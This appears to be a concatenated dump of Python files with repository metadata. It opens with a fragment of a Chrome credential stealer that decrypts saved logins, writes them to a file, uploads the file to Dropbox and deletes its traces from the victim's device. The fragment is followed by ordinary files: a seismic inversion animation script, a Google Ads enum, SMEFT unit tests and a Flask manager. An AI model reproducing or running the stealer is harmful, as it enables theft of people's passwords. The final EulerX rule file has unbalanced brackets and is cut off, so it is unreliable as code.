master_key = get_master_key()
login_db = os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\default\Login Data'
shutil.copy2(login_db, "Loginvault.db") #making a temp copy since Login Data DB is locked while Chrome is running
conn = sqlite3.connect("Loginvault.db")
cursor = conn.cursor()
try:
# grab the needed information
cursor.execute("SELECT action_url, username_value, password_value FROM logins")
# make a local file with the login data
passfile = open("rc.txt", "w")
for r in cursor.fetchall():
# these 2 are already in plain text
url = r[0]
username = r[1]
encrypted_password = r[2]
# now decrypt the password using the master key via AES encryption / decryption
decrypted_password = decrypt_password(encrypted_password, master_key)
#print("URL: " + url + "\nUsername: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 50 + "\n")
# sort it and make it look more organised
passfile.write("URL: " + url + "\nUsername: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 50 + "\n")
# finish the files
passfile.close()
conn.close()
except Exception as e:
print(e)
# upload the file to the dropbox
upload_passfile()
# finally delete the files off the victims device
os.remove("rc.txt")
os.remove("Loginvault.db")
| 38.215686
| 134
| 0.646998
|
42b37ca63dca7488737a9e86d516fdcff2c7c5b4
| 6,934
|
py
|
Python
|
tests/make_animation.py
|
larsgeb/psvWave
|
f02e7567d69fc6a6b5dbea8a3d2001e40c506019
|
[
"BSD-3-Clause"
] | 15
|
2020-10-18T07:01:37.000Z
|
2022-03-22T14:35:44.000Z
|
tests/make_animation.py
|
larsgeb/psvWave
|
f02e7567d69fc6a6b5dbea8a3d2001e40c506019
|
[
"BSD-3-Clause"
] | 4
|
2020-06-27T10:03:13.000Z
|
2020-07-07T08:36:27.000Z
|
tests/make_animation.py
|
larsgeb/forward-virieux
|
15b831b6ee2c8a9d3412f6dcd53fc52b81b88fae
|
[
"BSD-3-Clause"
] | 4
|
2018-11-16T07:16:31.000Z
|
2020-05-22T10:31:59.000Z
|
from matplotlib import animation
import psvWave
import matplotlib.pyplot as plt
import numpy
model = psvWave.fdModel(
"../tests/test_configurations/forward_configuration_4_sources.ini"
)
# Create target model ---------------------------------------------------------
# Get the coordinates of every grid point
IX, IZ = model.get_coordinates(True)
extent = model.get_extent(True)
# Get the associated parameter fields
vp, vs, rho = model.get_parameter_fields()
vp_starting = vp
vs_starting = vs
rho_starting = rho
numpy.save("vp_starting", vp_starting)
numpy.save("vs_starting", vs_starting)
numpy.save("rho_starting", rho_starting)
x_middle = (IX.max() + IX.min()) / 2
z_middle = (IZ.max() + IZ.min()) / 2
circle = ((IX - x_middle) ** 2 + (IZ - z_middle) ** 2) ** 0.5 < 15
vs = vs * (1 - 0.1 * circle)
vp = vp * (1 - 0.1 * circle)
cmap = plt.get_cmap("seismic")
plt.subplot(311)
plt.imshow(vp.T, extent=extent, vmin=1600, vmax=2400, cmap=cmap)
plt.subplot(312)
plt.imshow(vs.T, extent=extent, vmin=600, vmax=1000, cmap=cmap)
plt.subplot(313)
plt.imshow(rho.T, extent=extent, vmin=1200, vmax=1800, cmap=cmap)
plt.close()
vp_target = vp
vs_target = vs
rho_target = rho
numpy.save("vp_target", vp_target)
numpy.save("vs_target", vs_target)
numpy.save("rho_target", rho_target)
model.set_parameter_fields(vp_target, vs_target, rho_target)
# Create true data ------------------------------------------------------------
for i_shot in range(model.n_shots):
model.forward_simulate(i_shot, omp_threads_override=6)
# Cheating of course, as this is synthetically generated data.
ux_obs, uz_obs = model.get_synthetic_data()
# numpy.random.seed(0)
# std = 10.0
# ux_obs += std * numpy.random.randn(*ux_obs.shape)
# uz_obs += std * numpy.random.randn(*uz_obs.shape)
numpy.save("ux_obs", ux_obs)
numpy.save("uz_obs", uz_obs)
model.set_observed_data(ux_obs, uz_obs)
# Reverting the model to the starting model -----------------------------------
vp = vp_starting
vs = vs_starting
rho = rho_starting
model.set_parameter_fields(vp_starting, vs_starting, rho_starting)
for i_shot in range(model.n_shots):
model.forward_simulate(i_shot, omp_threads_override=6)
ux, uz = model.get_synthetic_data()
ux_obs, uz_obs = model.get_observed_data()
max_waveform = max(ux.max(), uz.max(), ux_obs.max(), uz.max()) / 2
m_ux_obs = ux_obs.copy()
m_ux = ux.copy()
for i in range(ux_obs.shape[1]):
m_ux_obs[0, i:, :] += max_waveform
m_ux[0, i:, :] += max_waveform
plt.plot(m_ux[0, :, :].T, "r", label="synthetic", alpha=0.5)
plt.plot(m_ux_obs[0, :, :].T, "k", label="observed", alpha=0.5)
plt.close()
# Perform adjoint simulation --------------------------------------------------
model.calculate_l2_misfit()
print(f"Data misfit: {model.misfit:.2f}")
model.calculate_l2_adjoint_sources()
model.reset_kernels()
for i_shot in range(model.n_shots):
model.adjoint_simulate(i_shot, omp_threads_override=6)
model.map_kernels_to_velocity()
g_vp, g_vs, g_rho = model.get_kernels()
extrema = numpy.abs(g_vp).max(), numpy.abs(g_vs).max(), numpy.abs(g_rho).max()
extent = (extent[0], extent[1], extent[3], extent[2])
gradients = [g_vp, g_vs, g_rho]
plt.figure(figsize=(10, 4))
for i in range(3):
plt.subplot(1, 3, int(i + 1))
plt.xlabel("x [m]")
plt.ylabel("z [m]")
plt.imshow(
gradients[i].T,
vmin=-extrema[i],
vmax=extrema[i],
cmap=plt.get_cmap("seismic"),
extent=extent,
)
plt.gca().invert_yaxis()
plt.colorbar()
plt.tight_layout()
plt.close()
# Start iterating -------------------------------------------------------------
m = model.get_model_vector()
print("Starting gradient descent")
fields_during_iteration = []
iterations = 15
try:
for i in range(iterations):
g = model.get_gradient_vector()
# Amplify Vp gradient
g[0:10800] *= 100
m -= 0.25 * g
model.set_model_vector(m)
fields_during_iteration.append(list(model.get_parameter_fields()))
# Simulate forward
for i_shot in range(model.n_shots):
model.forward_simulate(i_shot, omp_threads_override=6)
# Calculate misfit and adjoint sources
model.calculate_l2_misfit()
model.calculate_l2_adjoint_sources()
print(f"Data misfit: {model.misfit:.2f}")
# Simulate adjoint
model.reset_kernels()
for i_shot in range(model.n_shots):
model.adjoint_simulate(i_shot, omp_threads_override=6)
model.map_kernels_to_velocity()
except KeyboardInterrupt:
m = model.get_model_vector()
iterations = i
vp, vs, rho = model.get_parameter_fields()
fields = [vp, vs, rho]
maxf = [2400, 1000, 1800]
minf = [1600, 600, 1200]
fig = plt.figure(figsize=(10, 4))
def animate(j):
images = []
for i in range(3):
plt.subplot(1, 3, int(i + 1))
plt.cla()
plt.xlabel("x [m]")
plt.ylabel("z [m]")
images.append(
plt.imshow(
fields_during_iteration[j][i].T,
cmap=plt.get_cmap("seismic"),
extent=extent,
vmin=minf[i],
vmax=maxf[i],
)
)
plt.gca().invert_yaxis()
plt.tight_layout()
return tuple(images)
anim = animation.FuncAnimation(fig, animate, frames=iterations, interval=10)
plt.close()
# Bonus: Animating a wavefield ------------------------------------------------
fig = plt.figure(figsize=(4, 10))
ax = plt.subplot(211)
ax2 = plt.subplot(212)
plt.xlabel("x [m]")
plt.ylabel("z [m]")
vx, _, _, _, _ = model.get_snapshots()
vx = vx[0, :, :, :]
# Get the receivers
rx, rz = model.get_receivers()
dt = model.dt
nt = vx.shape[0]
snapshot_interval = model.snapshot_interval
abswave = numpy.max(numpy.abs(vx)) / 25
extent = (extent[0], extent[1], extent[3], extent[2])
t = numpy.linspace(0, dt * nt * snapshot_interval, nt * snapshot_interval)
def animate(i):
z1 = vx[int(i), :, :].T
ax.cla()
ax.set_xlabel("x [m]")
ax.set_ylabel("z [m]")
ax.scatter(rx, rz, color="k", marker="v")
ax.text(-5, -5, f"Time: {i * dt * snapshot_interval:.3f}")
im1 = ax.imshow(
z1, vmin=-abswave, vmax=abswave, cmap=plt.get_cmap("PRGn"), extent=extent,
)
ax.invert_yaxis()
ax2.cla()
ax2.set_ylim([0, t[-1]])
ax2.set_xlim(ax.get_xlim())
for ir in range(19):
ln1 = ax2.plot(
ux[0, ir, : i * snapshot_interval] / 100 + rx[ir],
t[: i * snapshot_interval],
"k",
alpha=0.5,
)
ln1 = ax2.plot(
uz[0, ir, : i * snapshot_interval] / 100 + rx[ir],
t[: i * snapshot_interval],
"k",
alpha=0.5,
)
ax2.invert_yaxis()
ax2.set_xlabel("x [m]")
ax2.set_ylabel("t [s]")
plt.tight_layout()
return im1, ln1
anim = animation.FuncAnimation(fig, animate, frames=nt, interval=1)
anim.save("video.mp4")
| 25.492647
| 82
| 0.613499
|
e50cb0f1dbf2d87261d5fa6bd68ea7caf29178d5
| 1,124
|
py
|
Python
|
google/ads/googleads/v8/googleads-py/google/ads/googleads/v8/errors/types/not_empty_error.py
|
googleapis/googleapis-gen
|
d84824c78563d59b0e58d5664bfaa430e9ad7e7a
|
[
"Apache-2.0"
] | 7
|
2021-02-21T10:39:41.000Z
|
2021-12-07T07:31:28.000Z
|
google/ads/googleads/v8/googleads-py/google/ads/googleads/v8/errors/types/not_empty_error.py
|
googleapis/googleapis-gen
|
d84824c78563d59b0e58d5664bfaa430e9ad7e7a
|
[
"Apache-2.0"
] | 6
|
2021-02-02T23:46:11.000Z
|
2021-11-15T01:46:02.000Z
|
google/ads/googleads/v8/googleads-py/google/ads/googleads/v8/errors/types/not_empty_error.py
|
googleapis/googleapis-gen
|
d84824c78563d59b0e58d5664bfaa430e9ad7e7a
|
[
"Apache-2.0"
] | 4
|
2021-01-28T23:25:45.000Z
|
2021-08-30T01:55:16.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package='google.ads.googleads.v8.errors',
marshal='google.ads.googleads.v8',
manifest={
'NotEmptyErrorEnum',
},
)
class NotEmptyErrorEnum(proto.Message):
r"""Container for enum describing possible not empty errors.
"""
class NotEmptyError(proto.Enum):
r"""Enum describing possible not empty errors."""
UNSPECIFIED = 0
UNKNOWN = 1
EMPTY_LIST = 2
__all__ = tuple(sorted(__protobuf__.manifest))
| 28.820513
| 74
| 0.705516
|
23e3522d632df3ac38ddaf8b081e711c2243eb92
| 3,847
|
py
|
Python
|
wilson/util/test_smeftutil.py
|
bednya/wilson
|
2cd803bc298c3f967401aed119f617fc5d7ba5c0
|
[
"MIT"
] | null | null | null |
wilson/util/test_smeftutil.py
|
bednya/wilson
|
2cd803bc298c3f967401aed119f617fc5d7ba5c0
|
[
"MIT"
] | null | null | null |
wilson/util/test_smeftutil.py
|
bednya/wilson
|
2cd803bc298c3f967401aed119f617fc5d7ba5c0
|
[
"MIT"
] | null | null | null |
import unittest
import numpy as np
import numpy.testing as npt
from wilson.run.smeft import beta
from wilson.util import smeftutil
from wilson.run.smeft.tests import test_beta
from wilson.test_wilson import get_random_wc
from wilson import wcxf
from numbers import Number
C = test_beta.C.copy()
for i in C:
if i in smeftutil.WC_keys_2f + smeftutil.WC_keys_4f:
# make Wilson coefficients involving fermions complex!
C[i] = C[i] + 1j*C[i]
class TestSymm(unittest.TestCase):
def test_keys(self):
# check no parameter or WC was forgotten in the C_symm_keys lists
self.assertEqual(
set(smeftutil.C_keys),
set([c for cs in smeftutil.C_symm_keys.values() for c in cs])
)
def test_symmetrize_symmetric(self):
a = np.array([[1, 2, 3], [2, 4, 5], [3, 5, 6]])
npt.assert_array_equal(smeftutil.symmetrize_2(a), a)
b = np.array([[1, 2, 3], [0, 4, 5], [0, 0, 6]])
npt.assert_array_equal(smeftutil.symmetrize_2(b), a)
def test_symmetrize_hermitian(self):
a = np.array([[1, 2j, 3j], [-2j, 4, 5j], [-3j, -5j, 6]])
npt.assert_array_equal(smeftutil.symmetrize_2(a), a)
b = np.array([[1, 2j, 3j], [0, 4, 5j], [0, 0, 6]])
npt.assert_array_equal(smeftutil.symmetrize_2(b), a)
def test_symmetrize_C(self):
C_symm = smeftutil.symmetrize(C)
# check all keys are present
self.assertSetEqual(set(C.keys()), set(C_symm.keys()))
for i, v in C_symm.items():
# check trivial cases are the same
if i in smeftutil.C_symm_keys[0] + smeftutil.C_symm_keys[1] + smeftutil.C_symm_keys[3]:
if smeftutil.C_keys_shape[i] == 1:
self.assertEqual(v, C[i])
else:
npt.assert_array_equal(v, C[i])
# check symmetric
elif i in smeftutil.C_symm_keys[9]:
npt.assert_array_equal(v, v.T)
# check hermitian
elif i in smeftutil.C_symm_keys[2]:
npt.assert_array_equal(v, v.T.conj())
# check 2 identical FFbar
elif i in smeftutil.C_symm_keys[4]:
npt.assert_array_equal(v, v.transpose((2, 3, 0, 1)))
npt.assert_array_equal(v, v.transpose((1, 0, 3, 2)).conj())
# check 2 independent FFbar
elif i in smeftutil.C_symm_keys[5]:
npt.assert_array_equal(v, v.transpose((1, 0, 3, 2)).conj())
# check special case ee
elif i in smeftutil.C_symm_keys[6]:
npt.assert_array_equal(v, v.transpose((2, 3, 0, 1)))
npt.assert_array_equal(v, v.transpose((0, 3, 2, 1)))
npt.assert_array_equal(v, v.transpose((2, 1, 0, 3)))
# check special case qque
elif i in smeftutil.C_symm_keys[7]:
npt.assert_array_equal(v, v.transpose((1, 0, 2, 3)))
# check special case qqql
elif i in smeftutil.C_symm_keys[8]:
# see eq. (10) of arXiv:1405.0486
npt.assert_array_almost_equal(v + v.transpose((1, 0, 2, 3)), v.transpose((1, 2, 0, 3)) + v.transpose((2, 1, 0, 3)), decimal=15)
def test_wcxf2array(self):
wc = get_random_wc('SMEFT', 'Warsaw', 160)
C = smeftutil.wcxf2arrays_symmetrized(wc.dict)
d = smeftutil.arrays2wcxf_nonred(C)
for k, v in wc.dict.items():
self.assertAlmostEqual(v, d[k], msg="Failed for {}".format(k))
def test_wcxf2array_incomplete(self):
wc = wcxf.WC('SMEFT', 'Warsaw', 160, {'G': 1e-10})
C = smeftutil.wcxf2arrays_symmetrized(wc.dict)
d = smeftutil.arrays2wcxf_nonred(C)
for k, v in d.items():
self.assertEqual(v, wc[k], msg="Failed for {}".format(k))
self.assertIsInstance(v, Number)
| 43.224719
| 143
| 0.587731
|
54a2820b7e2fafe68fca48c0dcb594ce898b3f2f
| 685
|
py
|
Python
|
manage.py
|
sayoojbk/recommendation
|
24d8e2b5c7c92550a4b0a9c2004eb33d0f50762f
|
[
"MIT"
] | 1
|
2020-06-20T06:02:51.000Z
|
2020-06-20T06:02:51.000Z
|
manage.py
|
sayoojbk/recommendation
|
24d8e2b5c7c92550a4b0a9c2004eb33d0f50762f
|
[
"MIT"
] | 2
|
2019-08-04T11:19:08.000Z
|
2019-08-20T16:34:12.000Z
|
manage.py
|
sayoojbk/recommendation
|
24d8e2b5c7c92550a4b0a9c2004eb33d0f50762f
|
[
"MIT"
] | 2
|
2019-07-30T13:17:23.000Z
|
2019-08-04T04:57:17.000Z
|
import os
import unittest
from flask_migrate import Migrate, MigrateCommand
from flask_script import Manager
from app import blueprint
from app.main import create_app
app = create_app(os.getenv('BOILERPLATE_ENV') or 'dev')
app.register_blueprint(blueprint)
app.app_context().push()
manager = Manager(app)
@manager.command
def run():
app.run(debug=True, host='0.0.0.0')
@manager.command
def test():
"""Runs the unit tests."""
tests = unittest.TestLoader().discover('app/test', pattern='test*.py')
result = unittest.TextTestRunner(verbosity=2).run(tests)
if result.wasSuccessful():
return 0
return 1
if __name__ == '__main__':
manager.run()
| 20.147059
| 74
| 0.715328
|
c12e3cd6fde55c67ce53fb7fecf63cff6a719dcb
| 31,186
|
py
|
Python
|
src-tmp/articulation2.py
|
EulerProject/EulerX
|
49e63e6a27be97ab30832180a47d214494388e15
|
[
"MIT"
] | 15
|
2016-02-17T20:48:29.000Z
|
2021-03-05T20:38:05.000Z
|
src-tmp/articulation2.py
|
eddy7896/EulerX
|
49e63e6a27be97ab30832180a47d214494388e15
|
[
"MIT"
] | 16
|
2015-02-05T18:38:48.000Z
|
2021-06-14T11:38:36.000Z
|
src-tmp/articulation2.py
|
eddy7896/EulerX
|
49e63e6a27be97ab30832180a47d214494388e15
|
[
"MIT"
] | 4
|
2016-01-26T03:24:52.000Z
|
2020-01-09T07:57:15.000Z
|
# Copyright (c) 2014 University of California, Davis
#
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import re
import copy
import commands
from relations import *
from taxonomy import *
class Articulation:
def __init__(self, initInput="", mapping=None):
self.string = initInput
self.numTaxon = 2
self.confidence = 2
self.relations = 0
if (initInput == ""):
self.taxon1 = Taxon()
self.taxon2 = Taxon()
self.taxon3 = Taxon()
self.taxon4 = Taxon()
self.taxon5 = Taxon()
return None
# Parsing begins here
if (initInput.find("confidence=") != -1):
elements = re.match("(.*) confidence=(.*)", initInput)
initInput = elements.group(1)
self.confidence = int(elements.group(2))
if (initInput.find("sum") != -1 or initInput.find("diff") != -1):
if (initInput.find("lsum") != -1):
self.relations = relation["+="]
elements = re.match("(.*)\.(.*) (.*)\.(.*) lsum (.*)\.(.*)", initInput)
elif (initInput.find("l3sum") != -1):
self.relations = relation["+3="]
elements = re.match("(.*)\.(.*) (.*)\.(.*) (.*)\.(.*) l3sum (.*)\.(.*)", initInput)
elif (initInput.find("l4sum") != -1):
self.relations = relation["+4="]
elements = re.match("(.*)\.(.*) (.*)\.(.*) (.*)\.(.*) (.*)\.(.*) l4sum (.*)\.(.*)", initInput)
elif (initInput.find("rsum") != -1):
self.relations = relation["=+"]
elements = re.match("(.*)\.(.*) rsum (.*)\.(.*) (.*)\.(.*)", initInput)
elif (initInput.find("r3sum") != -1):
self.relations = relation["=3+"]
elements = re.match("(.*)\.(.*) r3sum (.*)\.(.*) (.*)\.(.*) (.*)\.(.*)", initInput)
elif (initInput.find("r4sum") != -1):
self.relations = relation["=4+"]
elements = re.match("(.*)\.(.*) r4sum (.*)\.(.*) (.*)\.(.*) (.*)\.(.*) (.*)\.(.*)", initInput)
elif (initInput.find("ldiff") != -1):
self.relations = relation["-="]
elements = re.match("(.*)\.(.*) (.*)\.(.*) ldiff (.*)\.(.*)", initInput)
elif (initInput.find("rdiff") != -1):
self.relations = relation["=-"]
elements = re.match("(.*)\.(.*) rdiff (.*)\.(.*) (.*)\.(.*)", initInput)
elif (initInput.find("e4sum") != -1):
self.relations = 0 #[relationDict["+=+"]]
elements = re.match("(.*)\.(.*) (.*)\.(.*) e4sum (.*)\.(.*) (.*)\.(.*)", initInput)
elif (initInput.find("i4sum") != -1):
self.relations = 0 #[relationDict["+<=+"]]
elements = re.match("(.*)\.(.*) (.*)\.(.*) i4sum (.*)\.(.*) (.*)\.(.*)", initInput)
taxon1taxonomy = elements.group(1)
taxon1taxon = elements.group(2)
taxon2taxonomy = elements.group(3)
taxon2taxon = elements.group(4)
taxon3taxonomy = elements.group(5)
taxon3taxon = elements.group(6)
self.taxon1 = mapping.getTaxon(taxon1taxonomy, taxon1taxon)
self.taxon2 = mapping.getTaxon(taxon2taxonomy, taxon2taxon)
self.taxon3 = mapping.getTaxon(taxon3taxonomy, taxon3taxon)
self.numTaxon = 3
if(initInput.find("e4sum") != -1 or initInput.find("i4sum") != -1 or initInput.find("l3sum") != -1 or initInput.find("r3sum") != -1):
taxon4taxonomy = elements.group(7)
taxon4taxon = elements.group(8)
self.taxon4 = mapping.getTaxon(taxon4taxonomy, taxon4taxon)
self.numTaxon = 4
if(initInput.find("l4sum") != -1 or initInput.find("r4sum") != -1):
taxon4taxonomy = elements.group(7)
taxon4taxon = elements.group(8)
self.taxon4 = mapping.getTaxon(taxon4taxonomy, taxon4taxon)
taxon5taxonomy = elements.group(9)
taxon5taxon = elements.group(10)
self.taxon5 = mapping.getTaxon(taxon5taxonomy, taxon5taxon)
self.numTaxon = 5
else:
## initInput is of form b48.a equals k04.a
self.relation = 0
if (initInput.find("{") != -1):
elements = re.match("(.*)\.(.*) {(.*)} (.*)\.(.*)", initInput)
else:
elements = re.match("(.*)\.(.*) (.*) (.*)\.(.*)", initInput)
taxon1taxonomy = elements.group(1)
taxon1taxon = elements.group(2)
relString = elements.group(3)
taxon2taxonomy = elements.group(4)
taxon2taxon = elements.group(5)
if (relString.find(" ") != -1):
if (relation.has_key(relString)):
self.relations = rcc5[relString]
else:
relElements = re.split("\s", relString)
for rel in relElements:
self.relations |= rcc5[rel]
else:
self.relations = rcc5[relString]
self.taxon1 = mapping.getTaxon(taxon1taxonomy, taxon1taxon)
self.taxon2 = mapping.getTaxon(taxon2taxonomy, taxon2taxon)
def toASP(self, enc, rnr, align):
result = ""
name1 = self.taxon1.dlvName()
name2 = self.taxon2.dlvName()
if encode[enc] & encode["vr"] or encode[enc] & encode["dl"] or encode[enc] & encode["mn"]:
rule = {} # common encoding for both dlv and potassco
ruleEx = {} # for dlv only, can be easily converted to potassco
rule["equals"] = "ir(X, $r) :- out($x ,X), in($y ,X).\n"\
"ir(X, $r) :- in($x,X), out($y,X).\n"\
"ir(X, prod($r,R)) :- out3($x, X, R), in($y,X), ix.\n"\
"ir(X, prod($r,R)) :- in($x,X), out3($y, X, R), ix.\n"\
"pie($r, A, 1) :- ir(X, A), in($x, X), in($y, X), ix.\n"\
"c($r, A, 1) :- vr(X, A), in($x, X), in($y, X), ix.\n"
ruleEx["equals"] = ":- #count{X: vrs(X) $d in($x,X), in($y,X)} = 0, pw.\n"
rule["includes"] = "ir(X, $r) :- out($x,X), in($y,X), pw.\n"\
"ir(X, prod($r,R)) :- out3($x, X, R), in($y,X), ix.\n"\
"pie($r, A, 1) :- ir(X, A), in($x, X), out($y, X), ix.\n"\
"c($r, A, 1) :- vr(X, A), in($x, X), out($y, X), ix.\n"\
"pie($r, A, 2) :- ir(X, A), in($x, X), in($y, X), ix.\n"\
"c($r, A, 2) :- vr(X, A), in($x, X), in($y, X), ix.\n"\
"ir(X, $r) :- in($x,X), out($y,X), pw.\n"\
"pie($r, A, 1) :- ir(X, A), out($x, X), in($y, X), ix.\n"\
"c($r, A, 1) :- vr(X, A), out($x, X), in($y, X), ix.\n"\
"pie($r, A, 2) :- ir(X, A), in($x, X), in($y, X), ix.\n"\
"c($r, A, 2) :- vr(X, A), in($x, X), in($y, X), ix.\n"
ruleEx["includes"] = ":- #count{X: vrs(X), in($x,X), in($y,X)} = 0, pw.\n"\
":- #count{X: vrs(X), in($x,X), out($y,X)} = 0, pw.\n"
rule["is_included_in"] =\
"ir(X, $r) :- out($x,X), in($y,X), pw.\n"\
"pie($r, A, 1) :- ir(X, A), in($x, X), out($y, X), ix.\n"\
"c($r, A, 1) :- vr(X, A), in($x, X), out($y, X), ix.\n"\
"pie($r, A, 2) :- ir(X, A), in($x, X), in($y, X), ix.\n"\
"c($r, A, 2) :- vr(X, A), in($x, X), in($y, X), ix.\n"
ruleEx["is_included_in"] =\
":- #count{X: vrs(X), in($x,X), in($y,X)} = 0, pw.\n"\
":- #count{X: vrs(X), out($x,X), in($y,X)} = 0, pw.\n"
rule["disjoint"] = "pie($r, A, 1) :- ir(X, A), out($x, X), in($y, X), ix.\n"\
"c($r, A, 1) :- vr(X, A), out($x, X), in($y, X), ix.\n"\
"pie($r, A, 2) :- ir(X, A), in($x, X), out($y, X), ix.\n"\
"c($r, A, 2) :- vr(X, A), in($x, X), out($y, X), ix.\n"\
"ir(X, $r) :- in($x,X), in($y,X).\n"
ruleEx[rcc5["disjoint"]] =\
":- #count{X: vrs(X), in($x,X), out($y,X)} = 0, pw.\n"\
":- #count{X: vrs(X), out($x,X), in($y,X)} = 0, pw.\n"
rule[rcc5["overlaps"]] =\
"pie($r, A, 1) :- ir(X, A), in($x, X), out($y, X), ix.\n"\
"c($r, A, 1) :- vr(X, A), in($x, X), out($y, X), ix.\n"\
"pie($r, A, 2) :- ir(X, A), out($x, X), in($y, X), ix.\n"\
"c($r, A, 2) :- vr(X, A), out($x, X), in($y, X), ix.\n"\
"pie($r, A, 3) :- ir(X, A), in($x, X), in($y, X), ix.\n"\
"c($r, A, 3) :- vr(X, A), in($x, X), in($y, X), ix.\n"
ruleEx[rcc5["overlaps"]] =\
":- #count{X: vrs(X), in($x,X), out($y,X)} = 0, pw.\n"\
":- #count{X: vrs(X), out($x,X), in($y,X)} = 0, pw.\n"\
":- #count{X: vrs(X), in($x,X), in($y,X)} = 0, pw.\n"
rule[rcc5["equals"] | rcc5["disjoint"]] =\
":- #count{X : vrs(X), in($x, X), out($y, X)} > 0, #count{Y : vrs(Y), out($x, Y), in($y, Y)} > 0.\n"\
":- #count{X : vrs(X), in($x, X), out($y, X)} = 0, #count{Y : vrs(Y), out($x, Y), in($y, Y)} = 0.\n"\
":- #count{X : vrs(X), in($x, X), in($y, X)} > 0, #count{Y : vrs(Y), out($x, Y), in($y, Y)} = 0.\n"\
":- #count{X : vrs(X), in($x, X), in($y, X)} = 0, #count{Y : vrs(Y), out($x, Y), in($y, Y)} > 0.\n"
rule[rcc5["equals"] | rcc5["is_included_in"]] =\
"ir(X, $r) :- in($x,X), out($y,X).\n"\
"ir(X, prod($r,R)) :- in($x,X), out3($y, X, R), ix.\n"\
"pie($r, A, 1) :- ir(X, A), in($x, X), in($y, X), ix.\n"\
"c($r, A, 1) :- vr(X, A), in($x, X), in($y, X), ix.\n\n"
ruleEx[rcc5["equals"] | rcc5["is_included_in"]] =\
"vr(X, $r) v ir(X, $r) :- out($x,X), in($y,X).\n"\
":- #count{X: vrs(X), in($x,X), in($y,X)} = 0, pw.\n"
rule[rcc5["equals"] | rcc5["includes"]] =\
"ir(X, $r) :- out($x,X), in($y,X).\n"\
"ir(X, prod($r,R)) :- out3($x, X, R), in($y,X), ix.\n"\
"pie($r, A, 1) :- ir(X, A), in($x, X), in($y, X), ix.\n"\
"c($r, A, 1) :- vr(X, A), in($x, X), in($y, X), ix.\n\n"
ruleEx[rcc5["equals"] | rcc5["includes"]] =\
"vr(X, $r) v ir(X, $r) :- in($x,X), out($y,X).\n"\
":- #count{X: vrs(X), in($x,X), in($y,X)} = 0, pw.\n"
rule[rcc5["is_included_in"] | rcc5["includes"]] =\
"ir(X, $r) :- in($x,X), out($y,X), vr(Y, _), in($y,Y), out($x,Y).\n"\
"ir(Y, $r) :- #count{X: vrs(X), in($x,X), out($y,X)} > 0, in($y,Y), out($x,Y).\n"
rule[rcc5["disjoint"] | rcc5["overlaps"] =\
"ir(X, $r) v vr(X, $r) :- in($x,X), in($y,X).\n"
ruleEx[rcc5["disjoint"] | rcc5["overlaps"] =\
":- #count{X: vrs(X), in($x,X), out($y,X)} = 0, pw.\n"\
":- #count{X: vrs(X), in($y,X), out($x,X)} = 0, pw.\n"
rule[rcc5["equals"] | rcc5["overlaps"]] =\
":- #count{X: vrs(X), in($x,X), out($y,X)} > 0, #count{Y: vrs(Y), in($y,Y), out($x,Y)} = 0, pw.\n"\
"pie($r, A, 1) :- ir(X, A), in($y, X), out($x, X), #count{Y: vr(Y, _), in($x,Y), out($y,Y)} > 0, ix.\n"\
"c($r, A, 1) :- vr(X, A), in($x, X), out($y, X), #count{Y: vr(Y, _), in($y,Y), out($x,Y)} > 0, ix.\n\n"\
":- #count{X: vrs(X), in($x,X), out($y,X)} = 0, #count{Y: vrs(Y), in($y,Y), out($x,Y)} > 0, pw.\n"\
"pie($r, A, 2) :- ir(X, A), in($x, X), out($y, X), #count{Y: vr(Y, _), in($y,Y), out($x,Y)} > 0, ix.\n"\
"c($r, A, 2) :- vr(X, A), in($x, X), out($y, X), #count{Y: vr(Y, _), in($y,Y), out($x,Y)} > 0, ix.\n\n"\
":- #count{X: vrs(X), in($x,X), in($y,X)} = 0, pw.\n"\
"pie($r, A, 3) :- ir(X, A), in($x, X), in($y, X), ix.\n"\
"c($r, A, 3) :- vr(X, A), in($x, X), in($y, X), ix.\n\n"
rule[rcc5["is_included_in"] | rcc5["overlaps"]] =\
"vr(X, $r) v ir(X, $r) :- in($x,X), out($y,X).\n"\
":- #count{X: vrs(X), in($x,X), in($y,X)} = 0, pw.\n"\
":- #count{X: vrs(X), out($x,X), in($y,X)} = 0, pw.\n"\
"pie($r, A, 1) :- ir(X, A), in($x, X), in($y, X), ix.\n"\
"c($r, A, 1) :- vr(X, A), in($x, X), in($y, X), ix.\n\n"\
"pie($r, A, 2) :- ir(X, A), out($x, X), in($y, X), ix.\n"\
"c($r, A, 2) :- vr(X, A), out($x, X), in($y, X), ix.\n\n"
rule[rcc5["is_included_in"] | rcc5["disjoint"]] =\
":- #count{X: vrs(X), out($x,X), in($y,X)} = 0, pw.\n"\
":- #count{X: vrs(X), in($x,X), in($y,X)} > 0, #count{Y: vrs(Y), out($y,Y), in($x,Y)} > 0, pw.\n"\
":- #count{X: vrs(X), in($x,X), in($y,X)} = 0, #count{Y: vrs(Y), out($y,Y), in($x,Y)} = 0, pw.\n"\
"pie($r, A, 1) :- ir(X, A), out($x, X), in($y, X), ix.\n"\
